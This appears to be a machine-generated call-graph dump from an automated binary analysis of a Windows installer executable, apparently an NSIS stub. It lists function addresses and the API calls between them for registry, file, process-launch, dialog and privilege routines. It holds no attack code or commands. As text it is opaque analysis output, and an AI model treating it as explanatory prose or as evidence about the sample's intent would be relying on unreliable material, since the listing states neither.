GetDlgItem GetDlgItem 3280->3282 3287 4041e5 3281->3287 3297 401389 2 API calls 3281->3297 3286 4044c0 22 API calls 3282->3286 3284 403ff0 SetWindowPos 3283->3284 3285 404003 3283->3285 3284->3285 3289 40400c ShowWindow 3285->3289 3290 40404e 3285->3290 3291 404175 SetClassLongW 3286->3291 3298 404135 3287->3298 3351 40450c 3287->3351 3292 404127 3289->3292 3293 40402c GetWindowLongW 3289->3293 3294 404056 DestroyWindow 3290->3294 3295 40406d 3290->3295 3296 40140b 2 API calls 3291->3296 3373 404527 3292->3373 3293->3292 3300 404045 ShowWindow 3293->3300 3301 404449 3294->3301 3302 404072 SetWindowLongW 3295->3302 3303 404083 3295->3303 3296->3281 3304 4041bd 3297->3304 3300->3290 3301->3298 3309 40447a ShowWindow 3301->3309 3302->3298 3303->3292 3307 40408f GetDlgItem 3303->3307 3304->3287 3308 4041c1 SendMessageW 3304->3308 3305 40140b 2 API calls 3320 4041f7 3305->3320 3306 40444b DestroyWindow EndDialog 3306->3301 3310 4040a0 SendMessageW IsWindowEnabled 3307->3310 3311 4040bd 3307->3311 3308->3298 3309->3298 3310->3298 3310->3311 3313 4040ca 3311->3313 3314 404111 SendMessageW 3311->3314 3315 4040dd 3311->3315 3324 4040c2 3311->3324 3312 40657e 21 API calls 3312->3320 3313->3314 3313->3324 3314->3292 3317 4040e5 3315->3317 3318 4040fa 3315->3318 3367 40140b 3317->3367 3322 40140b 2 API calls 3318->3322 3319 4040f8 3319->3292 3320->3298 3320->3305 3320->3306 3320->3312 3323 4044c0 22 API calls 3320->3323 3342 40438b DestroyWindow 3320->3342 3354 4044c0 3320->3354 3325 404101 3322->3325 3323->3320 3370 404499 3324->3370 3325->3292 3325->3324 3327 404272 GetDlgItem 3328 404287 3327->3328 3329 40428f ShowWindow KiUserCallbackDispatcher 3327->3329 3328->3329 3357 4044e2 KiUserCallbackDispatcher 3329->3357 3331 4042b9 EnableWindow 3336 4042cd 3331->3336 3332 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3333 404302 SendMessageW 3332->3333 3332->3336 3333->3336 3336->3332 3358 4044f5 SendMessageW 3336->3358 3359 403fa2 3336->3359 3362 406541 lstrcpynW 3336->3362 3338 404331 lstrlenW 3339 40657e 21 API calls 3338->3339 3340 404347 SetWindowTextW 3339->3340 3363 401389 3340->3363 3342->3301 3343 4043a5 CreateDialogParamW 3342->3343 3343->3301 3344 4043d8 3343->3344 3345 4044c0 22 API calls 3344->3345 3346 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3345->3346 3347 401389 2 API calls 3346->3347 3348 404429 3347->3348 3348->3298 3349 404431 ShowWindow 3348->3349 3350 40450c SendMessageW 3349->3350 3350->3301 3352 404524 3351->3352 3353 404515 SendMessageW 3351->3353 3352->3320 3353->3352 3355 40657e 21 API calls 3354->3355 3356 4044cb SetDlgItemTextW 3355->3356 3356->3327 3357->3331 3358->3336 3360 40657e 21 API calls 3359->3360 3361 403fb0 SetWindowTextW 3360->3361 3361->3336 3362->3338 3365 401390 3363->3365 3364 4013fe 3364->3320 3365->3364 3366 4013cb MulDiv SendMessageW 3365->3366 3366->3365 3368 401389 2 API calls 3367->3368 3369 401420 3368->3369 3369->3324 3371 4044a0 3370->3371 3372 4044a6 SendMessageW 3370->3372 3371->3372 3372->3319 3374 4045ea 3373->3374 3375 40453f GetWindowLongW 3373->3375 3374->3298 3375->3374 3376 404554 3375->3376 3376->3374 3377 404581 GetSysColor 3376->3377 3378 404584 3376->3378 3377->3378 3379 404594 SetBkMode 3378->3379 3380 40458a SetTextColor 3378->3380 3381 4045b2 3379->3381 3382 4045ac GetSysColor 3379->3382 3380->3379 3383 4045b9 SetBkColor 3381->3383 3384 4045c3 3381->3384 3382->3381 3383->3384 3384->3374 3385 4045d6 DeleteObject 3384->3385 3386 4045dd CreateBrushIndirect 3384->3386 3385->3386 3386->3374 3991 402641 3992 402dcb 21 API calls 3991->3992 3993 402648 3992->3993 3996 406031 GetFileAttributesW CreateFileW 3993->3996 3995 402654 3996->3995 4004 4025c3 4014 402e0b 4004->4014 4007 402da9 21 API calls 4008 4025d6 4007->4008 4009 4025f2 RegEnumKeyW 4008->4009 4010 4025fe RegEnumValueW 4008->4010 4012 402953 4008->4012 4011 402613 RegCloseKey 4009->4011 4010->4011 4011->4012 4015 402dcb 21 API calls 4014->4015 4016 402e22 4015->4016 4017 4063ae RegOpenKeyExW 4016->4017 4018 4025cd 4017->4018 4018->4007 3595 4015c8 3596 402dcb 21 API calls 3595->3596 3597 4015cf SetFileAttributesW 3596->3597 3598 4015e1 3597->3598 4019 402c48 InvalidateRect 4020 402c4f 4019->4020 3604 401fc9 3605 402dcb 21 API calls 3604->3605 3606 401fcf 3605->3606 3607 4055c6 28 API calls 3606->3607 3608 401fd9 3607->3608 3619 405b24 CreateProcessW 3608->3619 3611 402953 3614 401ff4 3615 402004 3614->3615 3616 401ff9 3614->3616 3618 402002 CloseHandle 3615->3618 3627 406488 wsprintfW 3616->3627 3618->3611 3620 401fdf 3619->3620 3621 405b57 CloseHandle 3619->3621 3620->3611 3620->3618 3622 4069e0 WaitForSingleObject 3620->3622 3621->3620 3623 4069fa 3622->3623 3624 406a0c GetExitCodeProcess 3623->3624 3628 406971 3623->3628 3624->3614 3627->3618 3629 40698e PeekMessageW 3628->3629 3630 406984 DispatchMessageW 3629->3630 3631 40699e WaitForSingleObject 3629->3631 3630->3629 3631->3623 4024 40204f 4025 402dcb 21 API calls 4024->4025 4026 402056 4025->4026 4027 406935 5 API calls 4026->4027 4028 402065 4027->4028 4029 402081 GlobalAlloc 4028->4029 4030 4020f1 4028->4030 4029->4030 4031 402095 4029->4031 4032 406935 5 API calls 4031->4032 4033 40209c 4032->4033 4034 406935 5 API calls 4033->4034 4035 4020a6 4034->4035 4035->4030 4039 406488 wsprintfW 4035->4039 4037 4020df 4040 406488 wsprintfW 4037->4040 4039->4037 4040->4030 4041 40254f 4042 402e0b 21 API calls 4041->4042 4043 402559 4042->4043 4044 402dcb 21 API calls 4043->4044 4045 402562 4044->4045 4046 40256d RegQueryValueExW 4045->4046 4051 402953 4045->4051 4047 402593 RegCloseKey 4046->4047 4048 40258d 4046->4048 4047->4051 4048->4047 4052 406488 wsprintfW 4048->4052 4052->4047 4053 4021cf 4054 402dcb 21 API calls 4053->4054 4055 4021d6 4054->4055 4056 402dcb 21 API calls 4055->4056 4057 4021e0 4056->4057 4058 402dcb 21 API calls 4057->4058 4059 4021ea 4058->4059 4060 402dcb 21 API calls 4059->4060 4061 4021f4 4060->4061 4062 402dcb 21 API calls 4061->4062 4063 4021fe 4062->4063 4064 40223d CoCreateInstance 4063->4064 4065 402dcb 21 API calls 4063->4065 4068 40225c 4064->4068 4065->4064 4066 401423 28 API calls 4067 40231b 4066->4067 4068->4066 4068->4067 4069 403bd1 4070 403bdc 4069->4070 4071 403be0 4070->4071 4072 403be3 GlobalAlloc 4070->4072 4072->4071 4080 401a55 4081 402dcb 21 API calls 4080->4081 4082 401a5e ExpandEnvironmentStringsW 4081->4082 4083 401a72 4082->4083 4085 401a85 4082->4085 4084 401a77 lstrcmpW 4083->4084 4083->4085 4084->4085 4086 4014d7 4087 402da9 21 API calls 4086->4087 4088 4014dd Sleep 4087->4088 4090 402c4f 4088->4090 4096 4023d7 4097 4023e5 4096->4097 4098 4023df 4096->4098 4100 402dcb 21 API calls 4097->4100 4101 4023f3 4097->4101 4099 402dcb 21 API calls 4098->4099 4099->4097 4100->4101 4102 402dcb 21 API calls 4101->4102 4104 402401 4101->4104 4102->4104 4103 402dcb 21 API calls 4105 40240a WritePrivateProfileStringW 4103->4105 4104->4103 4106 402459 4107 402461 4106->4107 4108 40248c 4106->4108 4109 402e0b 21 API calls 4107->4109 4110 402dcb 21 API calls 4108->4110 4111 402468 4109->4111 4112 402493 4110->4112 4114 402dcb 21 API calls 4111->4114 4115 4024a0 4111->4115 4117 402e89 4112->4117 4116 402479 RegDeleteValueW RegCloseKey 4114->4116 4116->4115 4118 402e9d 4117->4118 4120 402e96 4117->4120 4118->4120 4121 402ece 4118->4121 4120->4115 4122 4063ae RegOpenKeyExW 4121->4122 4123 402efc 4122->4123 4124 402f0c RegEnumValueW 4123->4124 4131 402fa6 4123->4131 4133 402f2f 4123->4133 4126 402f96 RegCloseKey 4124->4126 4124->4133 4125 402f6b RegEnumKeyW 4127 402f74 RegCloseKey 4125->4127 4125->4133 4126->4131 4128 406935 5 API calls 4127->4128 4130 402f84 4128->4130 4129 402ece 6 API calls 4129->4133 4130->4131 4132 402f88 RegDeleteKeyW 4130->4132 4131->4120 4132->4131 4133->4125 4133->4126 4133->4127 4133->4129 4134 40175a 4135 402dcb 21 API calls 4134->4135 4136 401761 SearchPathW 4135->4136 4137 40177c 4136->4137 4138 401d5d 4139 402da9 21 API calls 4138->4139 4140 401d64 4139->4140 4141 402da9 21 API calls 4140->4141 4142 401d70 GetDlgItem 4141->4142 4143 40265d 4142->4143 4144 406c5f 4150 406ae3 4144->4150 4145 40744e 4146 406b64 GlobalFree 4147 406b6d GlobalAlloc 4146->4147 4147->4145 4147->4150 4148 406be4 GlobalAlloc 4148->4145 4148->4150 4149 406bdb GlobalFree 4149->4148 4150->4145 4150->4146 4150->4147 4150->4148 4150->4149 4151 402663 4152 402692 4151->4152 4153 402677 4151->4153 4155 4026c2 4152->4155 4156 402697 4152->4156 4154 402da9 21 API calls 4153->4154 4165 40267e 4154->4165 4158 402dcb 21 API calls 4155->4158 4157 402dcb 21 API calls 4156->4157 4159 40269e 4157->4159 4160 4026c9 lstrlenW 4158->4160 4168 406563 WideCharToMultiByte 4159->4168 4160->4165 4162 4026b2 lstrlenA 4162->4165 4163 4026f6 4164 40270c 4163->4164 4166 4060e3 WriteFile 4163->4166 4165->4163 4165->4164 4169 406112 SetFilePointer 4165->4169 4166->4164 4168->4162 4170 40612e 4169->4170 4173 406146 4169->4173 4171 4060b4 ReadFile 4170->4171 4172 40613a 4171->4172 4172->4173 4174 406177 SetFilePointer 4172->4174 4175 40614f SetFilePointer 4172->4175 4173->4163 4174->4173 4175->4174 4176 40615a 4175->4176 4177 4060e3 WriteFile 4176->4177 4177->4173 3556 4015e6 3557 402dcb 21 API calls 3556->3557 3558 4015ed 3557->3558 3576 405ebb CharNextW CharNextW 3558->3576 3560 4015f6 3561 401656 3560->3561 3562 405e3d CharNextW 3560->3562 3572 40163c GetFileAttributesW 3560->3572 3573 40161f 3560->3573 3586 405b0c 3560->3586 3592 405aef CreateDirectoryW 3560->3592 3563 40165b 3561->3563 3565 401688 3561->3565 3562->3560 3582 401423 3563->3582 3567 401423 28 API calls 3565->3567 3574 401680 3567->3574 3571 40166f SetCurrentDirectoryW 3571->3574 3572->3560 3573->3560 3589 405a95 CreateDirectoryW 3573->3589 3577 405ed8 3576->3577 3580 405eea 3576->3580 3579 405ee5 CharNextW 3577->3579 3577->3580 3578 405f0e 3578->3560 3579->3578 3580->3578 3581 405e3d CharNextW 3580->3581 3581->3580 3583 4055c6 28 API calls 3582->3583 3584 401431 3583->3584 3585 406541 lstrcpynW 3584->3585 3585->3571 3587 406935 5 API calls 3586->3587 3588 405b13 3587->3588 3588->3560 3590 405ae1 3589->3590 3591 405ae5 GetLastError 3589->3591 3590->3573 3591->3590 3593 405b03 GetLastError 3592->3593 3594 405aff 3592->3594 3593->3594 3594->3560 4184 401c68 4185 402da9 21 API calls 4184->4185 4186 401c6f 4185->4186 4187 402da9 21 API calls 4186->4187 4188 401c7c 4187->4188 4189 401c91 4188->4189 4190 402dcb 21 API calls 4188->4190 4191 401ca1 4189->4191 4192 402dcb 21 API calls 4189->4192 4190->4189 4193 401cf8 4191->4193 4194 401cac 4191->4194 4192->4191 4196 402dcb 21 API calls 4193->4196 4195 402da9 21 API calls 4194->4195 4197 401cb1 4195->4197 4198 401cfd 4196->4198 4199 402da9 21 API calls 4197->4199 4200 402dcb 21 API calls 4198->4200 4201 401cbd 4199->4201 4202 401d06 FindWindowExW 4200->4202 4203 401ce8 SendMessageW 4201->4203 4204 401cca SendMessageTimeoutW 4201->4204 4205 401d28 4202->4205 4203->4205 4204->4205 4213 4028e9 4214 4028ef 4213->4214 4215 4028f7 FindClose 4214->4215 4216 402c4f 4214->4216 4215->4216 4217 40496a 4218 4049a0 4217->4218 4219 40497a 4217->4219 4221 404527 8 API calls 4218->4221 4220 4044c0 22 API calls 4219->4220 4222 404987 SetDlgItemTextW 4220->4222 4223 4049ac 4221->4223 4222->4218 4224 4016f1 4225 402dcb 21 API calls 4224->4225 4226 4016f7 GetFullPathNameW 4225->4226 4227 401711 4226->4227 4233 401733 4226->4233 4230 40689e 2 API calls 4227->4230 4227->4233 4228 401748 GetShortPathNameW 4229 402c4f 4228->4229 4231 401723 4230->4231 4231->4233 4234 406541 lstrcpynW 4231->4234 4233->4228 4233->4229 4234->4233 4235 401e73 GetDC 4236 402da9 21 API calls 4235->4236 4237 401e85 GetDeviceCaps MulDiv ReleaseDC 4236->4237 4238 402da9 21 API calls 4237->4238 4239 401eb6 4238->4239 4240 40657e 21 API calls 4239->4240 4241 401ef3 CreateFontIndirectW 4240->4241 4242 40265d 4241->4242 4243 4014f5 SetForegroundWindow 4244 402c4f 4243->4244 4245 4045f6 lstrcpynW lstrlenW 4246 40197b 4247 402dcb 21 API calls 4246->4247 4248 401982 lstrlenW 4247->4248 4249 40265d 4248->4249 4250 4020fd 4251 40210f 4250->4251 4260 4021c1 4250->4260 4252 402dcb 21 API calls 4251->4252 4253 402116 4252->4253 4255 402dcb 21 API calls 4253->4255 4254 401423 28 API calls 4261 40231b 4254->4261 4256 40211f 4255->4256 4257 402135 LoadLibraryExW 4256->4257 4258 402127 GetModuleHandleW 4256->4258 4259 402146 4257->4259 4257->4260 4258->4257 4258->4259 4270 4069a4 4259->4270 4260->4254 4264 402190 4266 4055c6 28 API calls 4264->4266 4265 402157 4267 401423 28 API calls 4265->4267 4268 402167 4265->4268 4266->4268 4267->4268 4268->4261 4269 4021b3 FreeLibrary 4268->4269 4269->4261 4275 406563 WideCharToMultiByte 4270->4275 4272 4069c1 4273 4069c8 GetProcAddress 4272->4273 4274 402151 4272->4274 4273->4274 4274->4264 4274->4265 4275->4272 4276 402b7e 4277 402bd0 4276->4277 4278 402b85 4276->4278 4279 406935 5 API calls 4277->4279 4281 402da9 21 API calls 4278->4281 4283 402bce 4278->4283 4280 402bd7 4279->4280 4284 402dcb 21 API calls 4280->4284 4282 402b93 4281->4282 4285 402da9 21 API calls 4282->4285 4286 402be0 4284->4286 4288 402b9f 4285->4288 4286->4283 4287 402be4 IIDFromString 4286->4287 4287->4283 4289 402bf3 4287->4289 4293 406488 wsprintfW 4288->4293 4289->4283 4294 406541 lstrcpynW 4289->4294 4291 402c10 CoTaskMemFree 4291->4283 4293->4283 4294->4291 4302 40467f 4303 404697 4302->4303 4309 4047b1 4302->4309 4310 4044c0 22 API calls 4303->4310 4304 40481b 4305 4048e5 4304->4305 4306 404825 GetDlgItem 4304->4306 4311 404527 8 API calls 4305->4311 4307 4048a6 4306->4307 4308 40483f 4306->4308 4307->4305 4317 4048b8 4307->4317 4308->4307 4316 404865 SendMessageW LoadCursorW SetCursor 4308->4316 4309->4304 4309->4305 4312 4047ec GetDlgItem SendMessageW 4309->4312 4313 4046fe 4310->4313 4315 4048e0 4311->4315 4335 4044e2 KiUserCallbackDispatcher 4312->4335 4314 4044c0 22 API calls 4313->4314 4319 40470b CheckDlgButton 4314->4319 4339 40492e 4316->4339 4321 4048ce 4317->4321 4322 4048be SendMessageW 4317->4322 4333 4044e2 KiUserCallbackDispatcher 4319->4333 4321->4315 4326 4048d4 SendMessageW 4321->4326 4322->4321 4323 404816 4336 40490a 4323->4336 4326->4315 4328 404729 GetDlgItem 4334 4044f5 SendMessageW 4328->4334 4330 40473f SendMessageW 4331 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4330->4331 4332 40475c GetSysColor 4330->4332 4331->4315 4332->4331 4333->4328 4334->4330 4335->4323 4337 404918 4336->4337 4338 40491d SendMessageW 4336->4338 4337->4338 4338->4304 4342 405b67 ShellExecuteExW 4339->4342 4341 404894 LoadCursorW SetCursor 4341->4307 4342->4341 4343 402a7f 4344 402a82 4343->4344 4345 402ac9 4344->4345 4346 402aad 4344->4346 4355 402953 4344->4355 4347 402ae3 4345->4347 4348 402ad3 4345->4348 4351 402ab2 4346->4351 4352 402ac3 4346->4352 4350 40657e 21 API calls 4347->4350 4349 402da9 21 API calls 4348->4349 4349->4352 4350->4352 4356 406541 lstrcpynW 4351->4356 4352->4355 4357 406488 wsprintfW 4352->4357 4356->4355 4357->4355 4358 401000 4359 401037 BeginPaint GetClientRect 4358->4359 4360 40100c DefWindowProcW 4358->4360 4362 4010f3 4359->4362 4365 401179 4360->4365 4363 401073 CreateBrushIndirect FillRect DeleteObject 4362->4363 4364 4010fc 4362->4364 4363->4362 4366 401102 CreateFontIndirectW 4364->4366 4367 401167 EndPaint 4364->4367 4366->4367 4368 401112 6 API calls 4366->4368 4367->4365 4368->4367 4369 401781 4370 402dcb 21 API calls 4369->4370 4371 401788 4370->4371 4372 406060 2 API calls 4371->4372 4373 40178f 4372->4373 4373->4373 4374 401d82 4375 402da9 21 API calls 4374->4375 4376 401d93 SetWindowLongW 4375->4376 4377 402c4f 4376->4377 3387 401f03 3395 402da9 3387->3395 3389 401f09 3390 402da9 21 API calls 3389->3390 3391 401f15 3390->3391 3392 401f21 ShowWindow 3391->3392 3393 401f2c EnableWindow 3391->3393 3394 402c4f 3392->3394 3393->3394 3396 40657e 21 API calls 3395->3396 3397 402dbe 3396->3397 3397->3389 4378 401503 4379 401508 4378->4379 4381 40152e 4378->4381 4380 402da9 21 API calls 4379->4380 4380->4381 4382 402903 4383 40290b 4382->4383 4384 40290f FindNextFileW 4383->4384 4386 402921 4383->4386 4385 402968 4384->4385 4384->4386 4388 406541 lstrcpynW 4385->4388 4388->4386 3501 405705 3502 405726 GetDlgItem GetDlgItem GetDlgItem 3501->3502 3503 4058af 3501->3503 3546 4044f5 SendMessageW 3502->3546 3505 4058e0 3503->3505 3506 4058b8 GetDlgItem CreateThread CloseHandle 3503->3506 3508 40590b 3505->3508 3509 405930 3505->3509 3510 4058f7 ShowWindow ShowWindow 3505->3510 3506->3505 3549 405699 OleInitialize 3506->3549 3507 405796 3512 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3507->3512 3511 40596b 3508->3511 3514 405945 ShowWindow 3508->3514 3515 40591f 3508->3515 3516 404527 8 API calls 3509->3516 3548 4044f5 SendMessageW 3510->3548 3511->3509 3521 405979 SendMessageW 3511->3521 3519 40580b 3512->3519 3520 4057ef SendMessageW SendMessageW 3512->3520 3517 405965 3514->3517 3518 405957 3514->3518 3522 404499 SendMessageW 3515->3522 3528 40593e 3516->3528 3524 404499 SendMessageW 3517->3524 3523 4055c6 28 API calls 3518->3523 3525 405810 SendMessageW 3519->3525 3526 40581e 3519->3526 3520->3519 3527 405992 CreatePopupMenu 3521->3527 3521->3528 3522->3509 3523->3517 3524->3511 3525->3526 3530 4044c0 22 API calls 3526->3530 3529 40657e 21 API calls 3527->3529 3531 4059a2 AppendMenuW 3529->3531 3532 40582e 3530->3532 3533 4059d2 TrackPopupMenu 3531->3533 3534 4059bf GetWindowRect 3531->3534 3535 405837 ShowWindow 3532->3535 3536 40586b GetDlgItem SendMessageW 3532->3536 3533->3528 3538 4059ed 3533->3538 3534->3533 3539 40585a 3535->3539 3540 40584d ShowWindow 3535->3540 3536->3528 3537 405892 SendMessageW SendMessageW 3536->3537 3537->3528 3541 405a09 SendMessageW 3538->3541 3547 4044f5 SendMessageW 3539->3547 3540->3539 3541->3541 3542 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3541->3542 3544 405a4b SendMessageW 3542->3544 3544->3544 3545 405a74 GlobalUnlock SetClipboardData CloseClipboard 3544->3545 3545->3528 3546->3507 3547->3536 3548->3508 3550 40450c SendMessageW 3549->3550 3552 4056bc 3550->3552 3551 40450c SendMessageW 3553 4056f5 CoUninitialize 3551->3553 3554 401389 2 API calls 3552->3554 3555 4056e3 3552->3555 3554->3552 3555->3551 4389 404d07 4390 404d33 4389->4390 4391 404d17 4389->4391 4393 404d66 4390->4393 4394 404d39 SHGetPathFromIDListW 4390->4394 4400 405b85 GetDlgItemTextW 4391->4400 4396 404d49 4394->4396 4399 404d50 SendMessageW 4394->4399 4395 404d24 SendMessageW 4395->4390 4397 40140b 2 API calls 4396->4397 4397->4399 4399->4393 4400->4395 4401 401588 4402 402bc9 4401->4402 4405 406488 wsprintfW 4402->4405 4404 402bce 4405->4404 4406 40198d 4407 402da9 21 API calls 4406->4407 4408 401994 4407->4408 4409 402da9 21 API calls 4408->4409 4410 4019a1 4409->4410 4411 402dcb 21 API calls 4410->4411 4412 4019b8 lstrlenW 4411->4412 4414 4019c9 4412->4414 4413 401a0a 4414->4413 4418 406541 lstrcpynW 4414->4418 4416 4019fa 4416->4413 4417 4019ff lstrlenW 4416->4417 4417->4413 4418->4416 4419 40168f 4420 402dcb 21 API calls 4419->4420 4421 401695 4420->4421 4422 40689e 2 API calls 4421->4422 4423 40169b 4422->4423 4424 402b10 4425 402da9 21 API calls 4424->4425 4426 402b16 4425->4426 4427 40657e 21 API calls 4426->4427 4428 402953 4426->4428 4427->4428 4429 402711 4430 402da9 21 API calls 4429->4430 4431 402720 4430->4431 4432 40276a ReadFile 4431->4432 4433 4060b4 ReadFile 4431->4433 4434 4027aa MultiByteToWideChar 4431->4434 4435 40285f 4431->4435 4436 406112 5 API calls 4431->4436 4438 4027d0 SetFilePointer MultiByteToWideChar 4431->4438 4439 402870 4431->4439 4441 40285d 4431->4441 4432->4431 4432->4441 4433->4431 4434->4431 4442 406488 wsprintfW 4435->4442 4436->4431 4438->4431 4440 402891 SetFilePointer 4439->4440 4439->4441 4440->4441 4442->4441 4443 401491 4444 4055c6 28 API calls 4443->4444 4445 401498 4444->4445 3398 401794 3436 402dcb 3398->3436 3400 40179b 3401 4017c3 3400->3401 3402 4017bb 3400->3402 3479 406541 lstrcpynW 3401->3479 3478 406541 lstrcpynW 3402->3478 3405 4017c1 3409 4067ef 5 API calls 3405->3409 3406 4017ce 3480 405e10 lstrlenW CharPrevW 3406->3480 3419 4017e0 3409->3419 3413 4017f2 CompareFileTime 3413->3419 3414 4018b2 3446 4055c6 3414->3446 3416 4055c6 28 API calls 3418 40189e 3416->3418 3419->3413 3419->3414 3424 40657e 21 API calls 3419->3424 3428 406541 lstrcpynW 3419->3428 3431 405ba1 MessageBoxIndirectW 3419->3431 3434 401889 3419->3434 3442 40600c GetFileAttributesW 3419->3442 3445 406031 GetFileAttributesW CreateFileW 3419->3445 3483 40689e FindFirstFileW 3419->3483 3422 4018e3 SetFileTime 3423 4018f5 CloseHandle 3422->3423 3423->3418 3425 401906 3423->3425 3424->3419 3426 40190b 3425->3426 3427 40191e 3425->3427 3429 40657e 21 API calls 3426->3429 3430 40657e 21 API calls 3427->3430 3428->3419 3432 401913 lstrcatW 3429->3432 3433 401926 3430->3433 3431->3419 3432->3433 3435 405ba1 MessageBoxIndirectW 3433->3435 3434->3416 3434->3418 3435->3418 3437 402dd7 3436->3437 3438 40657e 21 API calls 3437->3438 3439 402df8 3438->3439 3440 402e04 3439->3440 3441 4067ef 5 API calls 3439->3441 3440->3400 3441->3440 3443 40602b 3442->3443 3444 40601e SetFileAttributesW 3442->3444 3443->3419 3444->3443 3445->3419 3447 4055e1 3446->3447 3455 4018bc 3446->3455 3448 4055fd lstrlenW 3447->3448 3451 40657e 21 API calls 3447->3451 3449 405626 3448->3449 3450 40560b lstrlenW 3448->3450 3453 405639 3449->3453 3454 40562c SetWindowTextW 3449->3454 3452 40561d lstrcatW 3450->3452 3450->3455 3451->3448 3452->3449 3453->3455 3456 40563f SendMessageW SendMessageW SendMessageW 3453->3456 3454->3453 3457 4032d9 3455->3457 3456->3455 3459 4032f2 3457->3459 3458 40331d 3486 4034be 3458->3486 3459->3458 3498 4034d4 SetFilePointer 3459->3498 3463 40333a GetTickCount 3474 40334d 3463->3474 3464 40345e 3465 403462 3464->3465 3469 40347a 3464->3469 3467 4034be ReadFile 3465->3467 3466 4018cf 3466->3422 3466->3423 3467->3466 3468 4034be ReadFile 3468->3469 3469->3466 3469->3468 3471 4060e3 WriteFile 3469->3471 3470 4034be ReadFile 3470->3474 3471->3469 3473 4033b3 GetTickCount 3473->3474 3474->3466 3474->3470 3474->3473 3475 4033dc MulDiv wsprintfW 3474->3475 3489 406ab0 3474->3489 3496 4060e3 WriteFile 3474->3496 3476 4055c6 28 API calls 3475->3476 3476->3474 3478->3405 3479->3406 3481 4017d4 lstrcatW 3480->3481 3482 405e2c lstrcatW 3480->3482 3481->3405 3482->3481 3484 4068b4 FindClose 3483->3484 3485 4068bf 3483->3485 3484->3485 3485->3419 3499 4060b4 ReadFile 3486->3499 3490 406ad5 3489->3490 3491 406add 3489->3491 3490->3474 3491->3490 3492 406b64 GlobalFree 3491->3492 3493 406b6d GlobalAlloc 3491->3493 3494 406be4 GlobalAlloc 3491->3494 3495 406bdb GlobalFree 3491->3495 3492->3493 3493->3490 3493->3491 3494->3490 3494->3491 3495->3494 3497 406101 3496->3497 3497->3474 3498->3458 3500 403328 3499->3500 3500->3463 3500->3464 3500->3466 4460 401a97 4461 402da9 21 API calls 4460->4461 4462 401aa0 4461->4462 4463 402da9 21 API calls 4462->4463 4464 401a45 4463->4464 3599 401598 3600 4015b1 3599->3600 3601 4015a8 ShowWindow 3599->3601 3602 402c4f 3600->3602 3603 4015bf ShowWindow 3600->3603 3601->3600 3603->3602 4465 402419 4466 402dcb 21 API calls 4465->4466 4467 402428 4466->4467 4468 402dcb 21 API calls 4467->4468 4469 402431 4468->4469 4470 402dcb 21 API calls 4469->4470 4471 40243b GetPrivateProfileStringW 4470->4471 4472 40201b 4473 402dcb 21 API calls 4472->4473 4474 402022 4473->4474 4475 40689e 2 API calls 4474->4475 4476 402028 4475->4476 4478 402039 4476->4478 4479 406488 wsprintfW 4476->4479 4479->4478 3632 40351c SetErrorMode GetVersionExW 3633 403570 GetVersionExW 3632->3633 3634 4035a8 3632->3634 3633->3634 3635 4035ff 3634->3635 3636 406935 5 API calls 3634->3636 3637 4068c5 3 API calls 3635->3637 3636->3635 3638 403615 lstrlenA 3637->3638 3638->3635 3639 403625 3638->3639 3640 406935 5 API calls 3639->3640 3641 40362c 3640->3641 3642 406935 5 API calls 3641->3642 3643 403633 3642->3643 3644 406935 5 API calls 3643->3644 3645 40363f #17 OleInitialize SHGetFileInfoW 3644->3645 3720 406541 lstrcpynW 3645->3720 3648 40368e GetCommandLineW 3721 406541 lstrcpynW 3648->3721 3650 4036a0 3651 405e3d CharNextW 3650->3651 3652 4036c6 CharNextW 3651->3652 3662 4036d8 3652->3662 3653 4037da 3654 4037ee GetTempPathW 3653->3654 3722 4034eb 3654->3722 3656 403806 3657 403860 DeleteFileW 3656->3657 3658 40380a GetWindowsDirectoryW lstrcatW 3656->3658 3732 4030a2 GetTickCount GetModuleFileNameW 3657->3732 3660 4034eb 12 API calls 3658->3660 3659 405e3d CharNextW 3659->3662 3663 403826 3660->3663 3662->3653 3662->3659 3666 4037dc 3662->3666 3663->3657 3665 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3663->3665 3664 403874 3667 40392b 3664->3667 3670 40391b 3664->3670 3674 405e3d CharNextW 3664->3674 3668 4034eb 12 API calls 3665->3668 3816 406541 lstrcpynW 3666->3816 3875 403b39 3667->3875 3672 403858 3668->3672 3760 403c13 3670->3760 3672->3657 3672->3667 3687 403893 3674->3687 3676 403a79 3680 405ba1 MessageBoxIndirectW 3676->3680 3677 403a9d 3678 403b21 ExitProcess 3677->3678 3679 403aa5 GetCurrentProcess OpenProcessToken 3677->3679 3681 403af1 3679->3681 3682 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3679->3682 3686 403a87 ExitProcess 3680->3686 3689 406935 5 API calls 3681->3689 3682->3681 3683 4038f1 3817 405f18 3683->3817 3684 403934 3688 405b0c 5 API calls 3684->3688 3687->3683 3687->3684 3691 403939 lstrlenW 3688->3691 3692 403af8 3689->3692 3833 406541 lstrcpynW 3691->3833 3695 403b0d ExitWindowsEx 3692->3695 3697 403b1a 3692->3697 3695->3678 3695->3697 3696 403953 3699 40395c 3696->3699 3717 40396b 3696->3717 3700 40140b 2 API calls 3697->3700 3834 406541 lstrcpynW 3699->3834 3700->3678 3701 403910 3832 406541 lstrcpynW 3701->3832 3704 403991 wsprintfW 3705 40657e 21 API calls 3704->3705 3705->3717 3706 405aef 2 API calls 3706->3717 3707 405a95 2 API calls 3707->3717 3708 403a07 SetCurrentDirectoryW 3871 406301 MoveFileExW 3708->3871 3709 4039cd GetFileAttributesW 3710 4039d9 DeleteFileW 3709->3710 3709->3717 3710->3717 3714 406301 40 API calls 3714->3717 3715 40657e 21 API calls 3715->3717 3716 405b24 2 API calls 3716->3717 3717->3667 3717->3704 3717->3706 3717->3707 3717->3708 3717->3709 3717->3714 3717->3715 3717->3716 3718 403a8f CloseHandle 3717->3718 3719 40689e 2 API calls 3717->3719 3835 405c4d 3717->3835 3718->3667 3719->3717 3720->3648 3721->3650 3723 4067ef 5 API calls 3722->3723 3725 4034f7 3723->3725 3724 403501 3724->3656 3725->3724 3726 405e10 3 API calls 3725->3726 3727 403509 3726->3727 3728 405aef 2 API calls 3727->3728 3729 40350f 3728->3729 3882 406060 3729->3882 3886 406031 GetFileAttributesW CreateFileW 3732->3886 3734 4030e2 3759 4030f2 3734->3759 3887 406541 lstrcpynW 3734->3887 3736 403108 3888 405e5c 